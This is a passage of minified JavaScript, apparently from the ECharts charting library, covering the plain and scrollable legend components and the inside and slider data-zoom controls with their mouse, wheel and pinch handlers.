inherit",miterLimit:"inherit"},textStyle:{color:Cf.color.secondary},selectedMode:!0,selector:!1,selectorLabel:{show:!0,borderRadius:10,padding:[3,5,3,5],fontSize:12,fontFamily:"sans-serif",color:Cf.color.tertiary,borderWidth:1,borderColor:Cf.color.border},emphasis:{selectorLabel:{show:!0,color:Cf.color.quaternary}},selectorPosition:"auto",selectorItemGap:7,selectorButtonGap:10,tooltip:{show:!1},triggerEvent:!1},e}(kf),CO=Z,IO=E,DO=ho,AO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.newlineDisabled=!1,n}return n(e,t),e.prototype.init=function(){this.group.add(this._contentGroup=new DO),this.group.add(this._selectorGroup=new DO),this._isFirstRender=!0},e.prototype.getContentGroup=function(){return this._contentGroup},e.prototype.getSelectorGroup=function(){return this._selectorGroup},e.prototype.render=function(t,e,n){var i=this._isFirstRender;if(this._isFirstRender=!1,this.resetInner(),t.get("show",!0)){var r=t.get("align"),o=t.get("orient");r&&"auto"!==r||(r="right"===t.get("left")&&"vertical"===o?"right":"left");var a=t.get("selector",!0),s=t.get("selectorPosition",!0);!a||s&&"auto"!==s||(s="horizontal"===o?"end":"start"),this.renderInner(r,t,e,n,a,o,s);var l=_f(t,n).refContainer,u=t.getBoxLayoutParams(),c=t.get("padding"),h=yf(u,l,c),p=this.layoutInner(t,r,h,i,a,s),d=yf(L({width:p.width,height:p.height},u),l,c);this.group.x=d.x-p.x,this.group.y=d.y-p.y,this.group.markRedraw(),this.group.add(this._backgroundEl=kA(p,t))}},e.prototype.resetInner=function(){this.getContentGroup().removeAll(),this._backgroundEl&&this.group.remove(this._backgroundEl),this.getSelectorGroup().removeAll()},e.prototype.renderInner=function(t,e,n,i,r,o,a){var s=this.getContentGroup(),l=mt(),u=e.get("selectedMode"),c=e.get("triggerEvent"),h=[];n.eachRawSeries(function(t){!t.get("legendHoverLink")&&h.push(t.id)}),IO(e.getData(),function(r,o){var a=this,p=r.get("name");if(!this.newlineDisabled&&(""===p||"\n"===p)){var d=new DO;return d.newline=!0,void s.add(d)}var f=n.getSeriesByName(p)[0];if(!l.get(p)){if(f){var g=f.getData(),v=g.getVisual("legendLineStyle")||{},y=g.getVisual("legendIcon"),m=g.getVisual("style"),_=this._createItem(f,p,o,r,e,t,v,m,y,u,i);_.on("click",CO(PO,p,null,i,h)).on("mouseover",CO(LO,f.name,null,i,h)).on("mouseout",CO(OO,f.name,null,i,h)),n.ssr&&_.eachChild(function(t){var e=hu(t);e.seriesIndex=f.seriesIndex,e.dataIndex=o,e.ssrType="legend"}),c&&_.eachChild(function(t){a.packEventData(t,e,f,o,p)}),l.set(p,!0)}else n.eachRawSeries(function(a){var s=this;if(!l.get(p)&&a.legendVisualProvider){var d=a.legendVisualProvider;if(!d.containName(p))return;var f=d.indexOfName(p),g=d.getItemVisual(f,"style"),v=d.getItemVisual(f,"legendIcon"),y=hi(g.fill);y&&0===y[3]&&(y[3]=.2,g=A(A({},g),{fill:xi(y,"rgba")}));var m=this._createItem(a,p,o,r,e,t,{},g,v,u,i);m.on("click",CO(PO,null,p,i,h)).on("mouseover",CO(LO,null,p,i,h)).on("mouseout",CO(OO,null,p,i,h)),n.ssr&&m.eachChild(function(t){var e=hu(t);e.seriesIndex=a.seriesIndex,e.dataIndex=o,e.ssrType="legend"}),c&&m.eachChild(function(t){s.packEventData(t,e,a,o,p)}),l.set(p,!0)}},this);0}},this),r&&this._createSelector(r,e,i,o,a)},e.prototype.packEventData=function(t,e,n,i,r){var o={componentType:"legend",componentIndex:e.componentIndex,dataIndex:i,value:r,seriesIndex:n.seriesIndex};hu(t).eventData=o},e.prototype._createSelector=function(t,e,n,i,r){var o=this.getSelectorGroup();IO(t,function(t){var i=t.type,r=new Ql({style:{x:0,y:0,align:"center",verticalAlign:"middle"},onclick:function(){n.dispatchAction({type:"all"===i?"legendAllSelect":"legendInverseSelect",legendId:e.id})}});o.add(r),Pp(r,{normal:e.getModel("selectorLabel"),emphasis:e.getModel(["emphasis","selectorLabel"])},{defaultText:t.title}),hc(r)})},e.prototype._createItem=function(t,e,n,i,r,o,a,s,l,u,c){var h=t.visualDrawType,p=r.get("itemWidth"),d=r.get("itemHeight"),f=r.isSelected(e),g=i.get("symbolRotate"),v=i.get("symbolKeepAspect"),y=i.get("icon"),m=function(t,e,n,i,r,o,a){function s(t,e){"auto"===t.lineWidth&&(t.lineWidth=e.lineWidth>0?2:0),IO(t,function(n,i){"inherit"===t[i]&&(t[i]=e[i])})}var l=e.getModel("itemStyle"),u=l.getItemStyle(),c=0===t.lastIndexOf("empty",0)?"fill":"stroke",h=l.getShallow("decal");u.decal=h&&"inherit"!==h?$m(h,a):i.decal,"inherit"===u.fill&&(u.fill=i[r]);"inherit"===u.stroke&&(u.stroke=i[c]);"inherit"===u.opacity&&(u.opacity=("fill"===r?i:n).opacity);s(u,i);var p=e.getModel("lineStyle"),d=p.getLineStyle();if(s(d,n),"auto"===u.fill&&(u.fill=i.fill),"auto"===u.stroke&&(u.stroke=i.fill),"auto"===d.stroke&&(d.stroke=i.fill),!o){var f=e.get("inactiveBorderWidth"),g=u[c];u.lineWidth="auto"===f?i.lineWidth>0&&g?2:0:u.lineWidth,u.fill=e.get("inactiveColor"),u.stroke=e.get("inactiveBorderColor"),d.stroke=p.get("inactiveColor"),d.lineWidth=p.get("inactiveWidth")}return{itemStyle:u,lineStyle:d}}(l=y||l||"roundRect",i,a,s,h,f,c),_=new DO,x=i.getModel("textStyle");if(!X(t.getLegendIcon)||y&&"inherit"!==y){var b="inherit"===y&&t.getData().getVisual("symbol")?"inherit"===g?t.getData().getVisual("symbolRotate"):g:0;_.add(function(t){var e=t.icon||"roundRect",n=Mm(e,0,0,t.itemWidth,t.itemHeight,t.itemStyle.fill,t.symbolKeepAspect);n.setStyle(t.itemStyle),n.rotation=(t.iconRotate||0)*Math.PI/180,n.setOrigin([t.itemWidth/2,t.itemHeight/2]),e.indexOf("empty")>-1&&(n.style.stroke=n.style.fill,n.style.fill=Cf.color.neutral00,n.style.lineWidth=2);return n}({itemWidth:p,itemHeight:d,icon:l,iconRotate:b,itemStyle:m.itemStyle,lineStyle:m.lineStyle,symbolKeepAspect:v}))}else _.add(t.getLegendIcon({itemWidth:p,itemHeight:d,icon:l,iconRotate:g,itemStyle:m.itemStyle,lineStyle:m.lineStyle,symbolKeepAspect:v}));var w="left"===o?p+5:-5,S=o,M=r.get("formatter"),T=e;j(M)&&M?T=M.replace("{name}",null!=e?e:""):X(M)&&(T=M(e));var k=f?x.getTextColor():i.get("inactiveColor");_.add(new Ql({style:Op(x,{text:T,x:w,y:d/2,fill:k,align:S,verticalAlign:"middle"},{inheritColor:k})}));var C=new jl({shape:_.getBoundingRect(),style:{fill:"transparent"}}),I=i.getModel("tooltip");return I.get("show")&&yp({el:C,componentModel:r,itemName:e,itemTooltipOption:I.option}),_.add(C),_.eachChild(function(t){t.silent=!0}),C.silent=!u,this.getContentGroup().add(_),hc(_),_.__legendDataIndex=n,_},e.prototype.layoutInner=function(t,e,n,i,r,o){var a=this.getContentGroup(),s=this.getSelectorGroup();gf(t.get("orient"),a,t.get("itemGap"),n.width,n.height);var l=a.getBoundingRect(),u=[-l.x,-l.y];if(s.markRedraw(),a.markRedraw(),r){gf("horizontal",s,t.get("selectorItemGap",!0));var c=s.getBoundingRect(),h=[-c.x,-c.y],p=t.get("selectorButtonGap",!0),d=t.getOrient().index,f=0===d?"width":"height",g=0===d?"height":"width",v=0===d?"y":"x";"end"===o?h[d]+=l[f]+p:u[d]+=c[f]+p,h[1-d]+=l[g]/2-c[g]/2,s.x=h[0],s.y=h[1],a.x=u[0],a.y=u[1];var y={x:0,y:0};return y[f]=l[f]+p+c[f],y[g]=Math.max(l[g],c[g]),y[v]=Math.min(0,c[v]+h[1-d]),y}return a.x=u[0],a.y=u[1],this.group.getBoundingRect()},e.prototype.remove=function(){this.getContentGroup().removeAll(),this._isFirstRender=!0},e.type="legend.plain",e}(ay);function PO(t,e,n,i){OO(t,e,n,i),n.dispatchAction({type:"legendToggleSelect",name:null!=t?t:e}),LO(t,e,n,i)}function LO(t,e,n,i){n.usingTHL()||n.dispatchAction({type:"highlight",seriesName:t,name:e,excludeSeriesId:i})}function OO(t,e,n,i){n.usingTHL()||n.dispatchAction({type:"downplay",seriesName:t,name:e,excludeSeriesId:i})}function RO(t,e,n){var i="allSelect"===t||"inverseSelect"===t,r={},o=[];n.eachComponent({mainType:"legend",query:e},function(n){i?n[t]():n[t](e.name),NO(n,r),o.push(n.componentIndex)});var a={};return n.eachComponent("legend",function(t){E(r,function(e,n){t[e?"select":"unSelect"](n)}),NO(t,a)}),i?{selected:a,legendIndex:o}:{name:e.name,selected:a}}function NO(t,e){var n=e||{};return E(t.getData(),function(e){var i=e.get("name");if("\n"!==i&&""!==i){var r=t.isSelected(i);wt(n,i)?n[i]=n[i]&&r:n[i]=r}}),n}var BO=Xa(function(t){var e=t.findComponents({mainType:"legend"});e&&e.length&&t.filterSeries(function(t){for(var n=0;n<e.length;n++)if(!e[n].isSelected(t.name))return!1;return!0})});function zO(t){t.registerComponentModel(kO),t.registerComponentView(AO),t.registerProcessor(t.PRIORITY.PROCESSOR.SERIES_FILTER,BO),t.registerSubTypeDefaulter("legend",function(){return"plain"}),function(t){t.registerAction("legendToggleSelect","legendselectchanged",Z(RO,"toggleSelected")),t.registerAction("legendAllSelect","legendselectall",Z(RO,"allSelect")),t.registerAction("legendInverseSelect","legendinverseselect",Z(RO,"inverseSelect")),t.registerAction("legendSelect","legendselected",Z(RO,"select")),t.registerAction("legendUnSelect","legendunselected",Z(RO,"unSelect"))}(t)}var EO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.setScrollDataIndex=function(t){this.option.scrollDataIndex=t},e.prototype.init=function(e,n,i){var r=Sf(e);t.prototype.init.call(this,e,n,i),VO(this,e,r)},e.prototype.mergeOption=function(e,n){t.prototype.mergeOption.call(this,e,n),VO(this,this.option,e)},e.type="legend.scroll",e.defaultOption=id(kO.defaultOption,{scrollDataIndex:0,pageButtonItemGap:5,pageButtonGap:null,pageButtonPosition:"end",pageFormatter:"{current}/{total}",pageIcons:{horizontal:["M0,0L12,-10L12,10z","M0,0L-12,-10L-12,10z"],vertical:["M0,0L20,0L10,-20z","M0,0L20,0L10,20z"]},pageIconColor:Cf.color.accent50,pageIconInactiveColor:Cf.color.accent10,pageIconSize:15,pageTextStyle:{color:Cf.color.tertiary},animationDurationUpdate:800}),e}(kO);function VO(t,e,n){var i=[1,1];i[t.getOrient().index]=0,wf(e,n,{type:"box",ignoreSize:!!i})}var FO=ho,HO=["width","height"],GO=["x","y"],WO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.newlineDisabled=!0,n._currentIndex=0,n}return n(e,t),e.prototype.init=function(){t.prototype.init.call(this),this.group.add(this._containerGroup=new FO),this._containerGroup.add(this.getContentGroup()),this.group.add(this._controllerGroup=new FO)},e.prototype.resetInner=function(){t.prototype.resetInner.call(this),this._controllerGroup.removeAll(),this._containerGroup.removeClipPath(),this._containerGroup.__rectSize=null},e.prototype.renderInner=function(e,n,i,r,o,a,s){var l=this;t.prototype.renderInner.call(this,e,n,i,r,o,a,s);var u=this._controllerGroup,c=n.get("pageIconSize",!0),h=Y(c)?c:[c,c];d("pagePrev",0);var p=n.getModel("pageTextStyle");function d(t,e){var i=t+"DataIndex",o=hp(n.get("pageIcons",!0)[n.getOrient().name][e],{onclick:U(l._pageGo,l,i,n,r)},{x:-h[0]/2,y:-h[1]/2,width:h[0],height:h[1]});o.name=t,u.add(o)}u.add(new Ql({name:"pageText",style:{text:"xx/xx",fill:p.getTextColor(),font:p.getFont(),verticalAlign:"middle",align:"center"},silent:!0})),d("pageNext",1)},e.prototype.layoutInner=function(t,e,n,i,r,o){var a=this.getSelectorGroup(),s=t.getOrient().index,l=HO[s],u=GO[s],c=HO[1-s],h=GO[1-s];r&&gf("horizontal",a,t.get("selectorItemGap",!0));var p=t.get("selectorButtonGap",!0),d=a.getBoundingRect(),f=[-d.x,-d.y],g=C(n);r&&(g[l]=n[l]-d[l]-p);var v=this._layoutContentAndController(t,i,g,s,l,c,h,u);if(r){if("end"===o)f[s]+=v[l]+p;else{var y=d[l]+p;f[s]-=y,v[u]-=y}v[l]+=d[l]+p,f[1-s]+=v[h]+v[c]/2-d[c]/2,v[c]=Math.max(v[c],d[c]),v[h]=Math.min(v[h],d[h]+f[1-s]),a.x=f[0],a.y=f[1],a.markRedraw()}return v},e.prototype._layoutContentAndController=function(t,e,n,i,r,o,a,s){var l=this.getContentGroup(),u=this._containerGroup,c=this._controllerGroup;gf(t.get("orient"),l,t.get("itemGap"),i?n.width:null,i?null:n.height),gf("horizontal",c,t.get("pageButtonItemGap",!0));var h=l.getBoundingRect(),p=c.getBoundingRect(),d=this._showController=h[r]>n[r],f=[-h.x,-h.y];e||(f[i]=l[s]);var g=[0,0],v=[-p.x,-p.y],y=at(t.get("pageButtonGap",!0),t.get("itemGap",!0));d&&("end"===t.get("pageButtonPosition",!0)?v[i]+=n[r]-p[r]:g[i]+=p[r]+y);v[1-i]+=h[o]/2-p[o]/2,l.setPosition(f),u.setPosition(g),c.setPosition(v);var m={x:0,y:0};if(m[r]=d?n[r]:h[r],m[o]=Math.max(h[o],p[o]),m[a]=Math.min(0,p[a]+v[1-i]),u.__rectSize=n[r],d){var _={x:0,y:0};_[r]=Math.max(n[r]-p[r]-y,0),_[o]=m[o],u.setClipPath(new jl({shape:_})),u.__rectSize=_[r]}else c.eachChild(function(t){t.attr({invisible:!0,silent:!0})});var x=this._getPageInfo(t);return null!=x.pageIndex&&Bh(l,{x:x.contentPosition[0],y:x.contentPosition[1]},d?t:null),this._updatePageInfoView(t,x),m},e.prototype._pageGo=function(t,e,n){var i=this._getPageInfo(e)[t];null!=i&&n.dispatchAction({type:"legendScroll",scrollDataIndex:i,legendId:e.id})},e.prototype._updatePageInfoView=function(t,e){var n=this._controllerGroup;E(["pagePrev","pageNext"],function(i){var r=null!=e[i+"DataIndex"],o=n.childOfName(i);o&&(o.setStyle("fill",r?t.get("pageIconColor",!0):t.get("pageIconInactiveColor",!0)),o.cursor=r?"pointer":"default")});var i=n.childOfName("pageText"),r=t.get("pageFormatter"),o=e.pageIndex,a=null!=o?o+1:0,s=e.pageCount;i&&r&&i.setStyle("text",j(r)?r.replace("{current}",null==a?"":a+"").replace("{total}",null==s?"":s+""):r({current:a,total:s}))},e.prototype._getPageInfo=function(t){var e=t.get("scrollDataIndex",!0),n=this.getContentGroup(),i=this._containerGroup.__rectSize,r=t.getOrient().index,o=HO[r],a=GO[r],s=this._findTargetItemIndex(e),l=n.children(),u=l[s],c=l.length,h=c?1:0,p={contentPosition:[n.x,n.y],pageCount:h,pageIndex:h-1,pagePrevDataIndex:null,pageNextDataIndex:null};if(!u)return p;var d=m(u);p.contentPosition[r]=-d.s;for(var f=s+1,g=d,v=d,y=null;f<=c;++f)(!(y=m(l[f]))&&v.e>g.s+i||y&&!_(y,g.s))&&(g=v.i>g.i?v:y)&&(null==p.pageNextDataIndex&&(p.pageNextDataIndex=g.i),++p.pageCount),v=y;for(f=s-1,g=d,v=d,y=null;f>=-1;--f)(y=m(l[f]))&&_(v,y.s)||!(g.i<v.i)||(v=g,null==p.pagePrevDataIndex&&(p.pagePrevDataIndex=g.i),++p.pageCount,++p.pageIndex),g=y;return p;function m(t){if(t){var e=t.getBoundingRect(),n=e[a]+t[a];return{s:n,e:n+e[o],i:t.__legendDataIndex}}}function _(t,e){return t.e>=e&&t.s<=e+i}},e.prototype._findTargetItemIndex=function(t){return this._showController?(this.getContentGroup().eachChild(function(i,r){var o=i.__legendDataIndex;null==n&&null!=o&&(n=r),o===t&&(e=r)}),null!=e?e:n):0;var e,n},e.type="legend.scroll",e}(AO);function UO(t){_x(zO),t.registerComponentModel(EO),t.registerComponentView(WO),function(t){t.registerAction("legendScroll","legendscroll",function(t,e){var n=t.scrollDataIndex;null!=n&&e.eachComponent({mainType:"legend",subType:"scroll",query:t},function(t){t.setScrollDataIndex(n)})})}(t)}var ZO=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="dataZoom.inside",e.defaultOption=id(lA.defaultOption,{disabled:!1,zoomLock:!1,zoomOnMouseWheel:!0,moveOnMouseMove:!0,moveOnMouseWheel:!1,preventDefaultMouseMove:!0}),e}(lA),YO=function(t){function e(e){var n=t.call(this)||this;n._zr=e;var i=U(n._mousedownHandler,n),r=U(n._mousemoveHandler,n),o=U(n._mouseupHandler,n),a=U(n._mousewheelHandler,n),s=U(n._pinchHandler,n);return n.enable=function(t,n){var l=n.zInfo,u=Mp(l.component),c=u.z,h=u.zlevel,p={component:l.component,z:c,zlevel:h,z2:at(l.z2,-1/0)},d=A({},n.triggerInfo);this._opt=L(A({},n),{zoomOnMouseWheel:!0,moveOnMouseMove:!0,moveOnMouseWheel:!1,preventDefaultMouseMove:!0,zInfoParsed:p,triggerInfo:d,cursorGrab:"grab",cursorGrabbing:"grabbing"}),null==t&&(t=!0),this._enabled&&this._controlType===t||(this.disable(),this._enabled=!0,!0!==t&&"move"!==t&&"pan"!==t||(KO(e,"mousedown",i,p),KO(e,"mousemove",r,p),KO(e,"mouseup",o,p)),!0!==t&&"scale"!==t&&"zoom"!==t||(KO(e,"mousewheel",a,p),KO(e,"pinch",s,p)))},n.disable=function(){this._enabled&&(this._enabled=!1,$O(e,"mousedown",i),$O(e,"mousemove",r),$O(e,"mouseup",o),$O(e,"mousewheel",a),$O(e,"pinch",s))},n}return n(e,t),e.prototype.isDragging=function(){return this._dragging},e.prototype.isPinching=function(){return this._pinching},e.prototype._checkPointer=function(t,e,n){var i=this._opt,r=i.zInfoParsed;if(RP(t,i.api,r.component))return!1;var o=i.triggerInfo,a=!1;return"global"===o.roamTrigger&&(a=!0),a||(a=o.isInSelf(t,e,n)),a&&o.isInClip&&!o.isInClip(t,e,n)&&(a=!1),a},e.prototype._decideCursorStyle=function(t,e,n,i){var r=t.target;return!r&&this._checkPointer(t,e,n)?this._opt.cursorGrab:i?r&&r.cursor||"default":void 0},e.prototype.dispose=function(){this.disable()},e.prototype._mousedownHandler=function(t){if(!ye(t)&&!XO(t)){for(var e=t.target;e;){if(e.draggable)return;e=e.__hostTarget||e.parent}var n=t.offsetX,i=t.offsetY;this._checkPointer(t,n,i)&&(this._x=n,this._y=i,this._dragging=!0)}},e.prototype._mousemoveHandler=function(t){var e=this._zr;if("pinch"!==t.gestureEvent&&!YA(e,"globalPan")&&!XO(t)){var n=t.offsetX,i=t.offsetY;if(this._dragging&&tR("moveOnMouseMove",t,this._opt)){e.setCursorStyle(this._opt.cursorGrabbing);var r=this._x,o=this._y,a=n-r,s=i-o;this._x=n,this._y=i,this._opt.preventDefaultMouseMove&&ve(t.event),t.__ecRoamConsumed=!0,JO(this,"pan","moveOnMouseMove",t,{dx:a,dy:s,oldX:r,oldY:o,newX:n,newY:i,isAvailableBehavior:null})}else{var l=this._decideCursorStyle(t,n,i,!1);l&&e.setCursorStyle(l)}}},e.prototype._mouseupHandler=function(t){if(!XO(t)){var e=this._zr;if(!ye(t)){this._dragging=!1;var n=this._decideCursorStyle(t,t.offsetX,t.offsetY,!0);n&&e.setCursorStyle(n)}}},e.prototype._mousewheelHandler=function(t){if(!XO(t)){var e=tR("zoomOnMouseWheel",t,this._opt),n=tR("moveOnMouseWheel",t,this._opt),i=t.wheelDelta,r=Math.abs(i),o=t.offsetX,a=t.offsetY;if(0!==i&&(e||n)){if(e){var s=r>3?1.4:r>1?1.2:1.1,l=i>0?s:1/s;this._checkTriggerMoveZoom(this,"zoom","zoomOnMouseWheel",t,{scale:l,originX:o,originY:a,isAvailableBehavior:null})}if(n){var u=Math.abs(i),c=(i>0?1:-1)*(u>3?.4:u>1?.15:.05);this._checkTriggerMoveZoom(this,"scrollMove","moveOnMouseWheel",t,{scrollDelta:c,originX:o,originY:a,isAvailableBehavior:null})}}}},e.prototype._pinchHandler=function(t){if(!YA(this._zr,"globalPan")&&!XO(t)){var e=t.pinchScale>1?1.1:1/1.1;this._checkTriggerMoveZoom(this,"zoom",null,t,{scale:e,originX:t.pinchX,originY:t.pinchY,isAvailableBehavior:null})}},e.prototype._checkTriggerMoveZoom=function(t,e,n,i,r){t._checkPointer(i,r.originX,r.originY)&&(ve(i.event),i.__ecRoamConsumed=!0,JO(t,e,n,i,r))},e}(Kt);function XO(t){return t.__ecRoamConsumed}var jO=Ta();function qO(t){var e=jO(t);return e.roam=e.roam||{},e.uniform=e.uniform||{},e}function KO(t,e,n,i){for(var r=qO(t).roam,o=r[e]=r[e]||[],a=0;a<o.length;a++){var s=o[a].zInfoParsed;if((s.zlevel-i.zlevel||s.z-i.z||s.z2-i.z2)<=0)break}o.splice(a,0,{listener:n,zInfoParsed:i}),function(t,e){var n=qO(t);n.uniform[e]||t.on(e,n.uniform[e]=function(t){var i=n.roam[e];if(i)for(var r=0;r<i.length;r++)i[r].listener(t)})}(t,e)}function $O(t,e,n){for(var i=qO(t).roam[e]||[],r=0;r<i.length;r++)if(i[r].listener===n)return i.splice(r,1),void(i.length||QO(t,e))}function QO(t,e){var n=qO(t).uniform;n[e]&&(t.off(e,n[e]),n[e]=null)}function JO(t,e,n,i,r){r.isAvailableBehavior=U(tR,null,n,i),t.trigger(e,r)}function tR(t,e,n){var i=n[t];return!t||i&&(!j(i)||e.event[i+"Key"])}var eR=Ta();function nR(t,e){if(e){t.removeKey(e.model.uid);var n=e.controller;n&&n.dispose()}}function iR(t,e){t.isDisposed()||t.dispatchAction({type:"dataZoom",animation:{easing:"cubicOut",duration:100},batch:e})}function rR(t,e,n,i){return t.coordinateSystem.containPoint([n,i])}function oR(t){t.registerUpdateLifecycle("coordsys:aftercreate",function(t,e){var n=eR(e),i=n.coordSysRecordMap||(n.coordSysRecordMap=mt());i.each(function(t){t.dataZoomInfoMap=null}),t.eachComponent({mainType:"dataZoom",subType:"inside"},function(t){E(iA(t).infoList,function(n){var r=n.model.uid,o=i.get(r)||i.set(r,function(t,e){var n={model:e,containsPoint:Z(rR,e),dispatchAction:Z(iR,t),dataZoomInfoMap:null,controller:null},i=n.controller=new YO(t.getZr());return E(["pan","zoom","scrollMove"],function(t){i.on(t,function(e){var i=[];n.dataZoomInfoMap.each(function(r){if(e.isAvailableBehavior(r.model.option)){var o=(r.getRange||{})[t],a=o&&o(r.dzReferCoordSysInfo,n.model.mainType,n.controller,e);!r.model.get("disabled",!0)&&a&&i.push({dataZoomId:r.model.id,start:a[0],end:a[1]})}}),i.length&&n.dispatchAction(i)})}),n}(e,n.model));(o.dataZoomInfoMap||(o.dataZoomInfoMap=mt())).set(t.uid,{dzReferCoordSysInfo:n,model:t,getRange:null})})}),i.each(function(t){var n,r=t.controller,o=t.dataZoomInfoMap;if(o){var a=o.keys()[0];null!=a&&(n=o.get(a))}if(n){var s=function(t,e,n){var i,r,o,a="type_",s={type_true:2,type_move:1,type_false:0,type_undefined:-1},l=!0;return t.each(function(t){var e=t.model,n=!e.get("disabled",!0)&&(!e.get("zoomLock",!0)||"move");s[a+n]>s[a+i]&&(i=n),l=l&&e.get("preventDefaultMouseMove",!0),r=at(e.get("cursorGrab",!0),r),o=at(e.get("cursorGrabbing",!0),o)}),{controlType:i,opt:{zoomOnMouseWheel:!0,moveOnMouseMove:!0,moveOnMouseWheel:!0,preventDefaultMouseMove:!!l,api:n,zInfo:{component:e.model},triggerInfo:{roamTrigger:null,isInSelf:e.containsPoint},cursorGrab:r,cursorGrabbing:o}}}(o,t,e);r.enable(s.controlType,s.opt),xy(t,"dispatchAction",n.model.get("throttle",!0),"fixRate")}else nR(i,t)})})}var aR=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type="dataZoom.inside",e}return n(e,t),e.prototype.render=function(e,n,i){t.prototype.render.apply(this,arguments),e.noTarget()?this._clear():(this.range=e.getPercentRange(),function(t,e,n){eR(t).coordSysRecordMap.each(function(t){var i=t.dataZoomInfoMap.get(e.uid);i&&(i.getRange=n)})}(i,e,{pan:U(sR.pan,this),zoom:U(sR.zoom,this),scrollMove:U(sR.scrollMove,this)}))},e.prototype.dispose=function(){this._clear(),t.prototype.dispose.apply(this,arguments)},e.prototype._clear=function(){!function(t,e){for(var n=eR(t).coordSysRecordMap,i=n.keys(),r=0;r<i.length;r++){var o=i[r],a=n.get(o),s=a.dataZoomInfoMap;if(s){var l=e.uid;s.get(l)&&(s.removeKey(l),s.keys().length||nR(n,a))}}}(this.api,this.dataZoomModel),this.range=null},e.type="dataZoom.inside",e}(hA),sR={zoom:function(t,e,n,i){var r=this.range,o=r.slice(),a=t.axisModels[0];if(a){var s=uR[e](null,[i.originX,i.originY],a,n,t),l=(s.signal>0?s.pixelStart+s.pixelLength-s.pixel:s.pixel-s.pixelStart)/s.pixelLength*(o[1]-o[0])+o[0],u=Math.max(1/i.scale,0);o[0]=(o[0]-l)*u+l,o[1]=(o[1]-l)*u+l;var c=this.dataZoomModel.findRepresentativeAxisProxy().getMinMaxSpan();return dA(0,o,[0,100],0,c.minSpan,c.maxSpan),this.range=o,r[0]!==o[0]||r[1]!==o[1]?o:void 0}},pan:lR(function(t,e,n,i,r,o){var a=uR[i]([o.oldX,o.oldY],[o.newX,o.newY],e,r,n);return a.signal*(t[1]-t[0])*a.pixel/a.pixelLength}),scrollMove:lR(function(t,e,n,i,r,o){return uR[i]([0,0],[o.scrollDelta,o.scrollDelta],e,r,n).signal*(t[1]-t[0])*o.scrollDelta})};function lR(t){return function(e,n,i,r){var o=this.range,a=o.slice(),s=e.axisModels[0];if(s)return dA(t(a,s,e,n,i,r),a,[0,100],"all"),this.range=a,o[0]!==a[0]||o[1]!==a[1]?a:void 0}}var uR={grid:function(t,e,n,i,r){var o=n.axis,a={},s=r.model.coordinateSystem.getRect();return t=t||[0,0],"x"===o.dim?(a.pixel=e[0]-t[0],a.pixelLength=s.width,a.pixelStart=s.x,a.signal=o.inverse?1:-1):(a.pixel=e[1]-t[1],a.pixelLength=s.height,a.pixelStart=s.y,a.signal=o.inverse?-1:1),a},polar:function(t,e,n,i,r){var o=n.axis,a={},s=r.model.coordinateSystem,l=s.getRadiusAxis().getExtent(),u=s.getAngleAxis().getExtent();return t=t?s.pointToCoord(t):[0,0],e=s.pointToCoord(e),"radiusAxis"===n.mainType?(a.pixel=e[0]-t[0],a.pixelLength=l[1]-l[0],a.pixelStart=l[0],a.signal=o.inverse?1:-1):(a.pixel=e[1]-t[1],a.pixelLength=u[1]-u[0],a.pixelStart=u[0],a.signal=o.inverse?-1:1),a},singleAxis:function(t,e,n,i,r){var o=n.axis,a=r.model.coordinateSystem.getRect(),s={};return t=t||[0,0],"horizontal"===o.orient?(s.pixel=e[0]-t[0],s.pixelLength=a.width,s.pixelStart=a.x,s.signal=o.inverse?1:-1):(s.pixel=e[1]-t[1],s.pixelLength=a.height,s.pixelStart=a.y,s.signal=o.inverse?-1:1),s}};function cR(t){_A(t),t.registerComponentModel(ZO),t.registerComponentView(aR),oR(t)}var hR=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="dataZoom.slider",e.layoutMode="box",e.defaultOption=id(lA.defaultOption,{show:!0,right:"ph",top:"ph",width:"ph",height:"ph",left:null,bottom:null,borderColor:Cf.color.accent10,borderRadius:0,backgroundColor:Cf.color.transparent,dataBackground:{lineStyle:{color:Cf.color.accent30,width:.5},areaStyle:{color:Cf.color.accent20,opacity:.2}},selectedDataBackground:{lineStyle:{color:Cf.color.accent40,width:.5},areaStyle:{color:Cf.color.accent20,opacity:.3}},fillerColor:"rgba(135,175,274,0.2)",handleIcon:"path://M-9.35,34.56V42m0-40V9.5m-2,0h4a2,2,0,0,1,2,2v21a2,2,0,0,1-2,2h-4a2,2,0,0,1-2-2v-21A2,2,0,0,1-11.35,9.5Z",handleSize:"100%",handleStyle:{color:Cf.color.neutral00,borderColor:Cf.color.accent20},moveHandleSize:7,moveHandleIcon:"path://M-320.9-50L-320.9-50c18.1,0,27.1,9,27.1,27.1V85.7c0,18.1-9,27.1-27.1,27.1l0,0c-18.1,0-27.1-9-27.1-27.1V-22.9C-348-41-339-50-320.9-50z M-212.3-50L-212.3-50c18.1,0,27.1,9,27.1,27.1V85.7c0,18.1-9,27.1-27.1,27.1l0,0c-18.1,0-27.1-9-27.1-27.1V-22.9C-239.4-41-230.4-50-212.3-50z M-103.7-50L-103.7-50c18.1,0,27.1,9,27.1,27.1V85.7c0,18.1-9,27.1-27.1,27.1l0,0c-18.1,0-27.1-9-27.1-27.1V-22.9C-130.9-41-121.8-50-103.7-50z",moveHandleStyle:{color:Cf.color.accent40,opacity:.5},showDetail:!0,showDataShadow:"auto",realtime:!0,zoomLock:!1,textStyle:{color:Cf.color.tertiary},brushSelect:!0,brushStyle:{color:Cf.color.accent30,opacity:.3},emphasis:{handleLabel:{show:!0},handleStyle:{borderColor:Cf.color.accent40},moveHandleStyle:{opacity:.8}},defaultLocationEdgeGap:15}),e}(lA),pR=jl,dR="horizontal",fR="vertical",gR=["line","bar","candlestick","scatter"],vR={easing:"cubicOut",duration:100,delay:0},yR=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n._displayables={},n}return 